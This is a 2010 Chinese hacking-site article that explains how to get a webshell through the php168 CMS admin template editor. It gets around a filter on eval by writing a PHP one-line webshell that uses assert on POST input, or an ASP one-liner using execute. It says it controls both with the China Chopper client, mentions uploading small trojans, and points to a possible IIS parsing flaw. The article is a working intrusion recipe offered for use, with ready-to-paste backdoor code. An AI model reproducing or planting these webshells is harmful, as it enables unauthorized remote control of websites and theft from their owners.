首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
php168新版后台模板拿shell
来源:[3E.S.T]信息安全团队 作者:just4u 发布时间:2010-08-23  
本人一向没什么技术文章
只是一个技巧
欢迎各位补充指点
刚刚看了黑影小子渗透cmd5的文章
说后台模板那块和谐了eval
我刚刚在官网下载了php168的系统本地搭建起来
主要看了一下后台模板那里
我们新建一个页面试试

 


打开生成的文件如同黑影小子所说eval被和谐

 


那怎么办呢

第一种方法...
意思大家都懂我也就不一一截图了
既然是只过滤了eval函数那有没有一个函数可以替代eval函数呢?
这个可以有
那就是assert函数
ok新建页面那里文件
文件名aaa.php
内容
复制内容到剪贴板
代码:
<?php assert($_POST[cmd]);?>
打开目录里生成的文件查看

 


代码完好
这里要说明一下
直接用那网页版的php客户端连接有可能出现错误提示
用菜刀就行了嘛..证实此一句话可用 如图

 



第二种方法...
如果如果服务器支持asp
我们可以在新建页面那里尝试写入asp一句话
因为asp里面的execute函数也可以替代eval且未被过滤
新建xx.asp 写入<%execute request("3est")%>
用菜刀连接成功
这个就不截图了....
这里多说一点
上次拿一个phpcms的还是php什么的站点
具体哪个系统我也忘了
新建页面写入一句话之后
打开写入一句话的文件发现系统给加了exit函数
这种情况下如果支持asp
那么新建asp一句话木马就可以突破

第三种方法...
新建页面这里不用一句话
直接上小马
asp和php小马都测试成功..
上一个图就ok

 


上述三种方法测试成功

还有一个是偶然发现的没来得及测试
就是新建页面那里有一个
在线上传
但是只允许上传zip格式的文件

 


提交之后会在程序目录生成一个以模板路径为名字的文件夹
比如我这个就会在目录生成ccc.php的文件夹
但是我打包上传的文件都未在那个文件夹里显示
经监控是是放在tmp目录里了
有兴趣的可以继续看看能否利用ccc.php这样的iis解析漏洞...

作者 just4u   [3E.S.T]信息安全团队,由情整理编辑


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·使用Adsutil.vbs脚本获取IIS配置
·cookie注射批量拿企业站
·ECSHOP 搜索注入漏洞利用exp及后
·传递哈希入侵技术
·Z-BLOG后台getshell方法
·DEDECMS后台另类拿Shell方法
·利用Shift后门提权入侵服务器方
·网趣shopV9.7注入漏洞
·帝国cms后台拿shell
·Access偏移注入检测北大分站
·利用qq2010,远程控制别人机器
·Windows文件系统漏洞-小漏洞,大
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved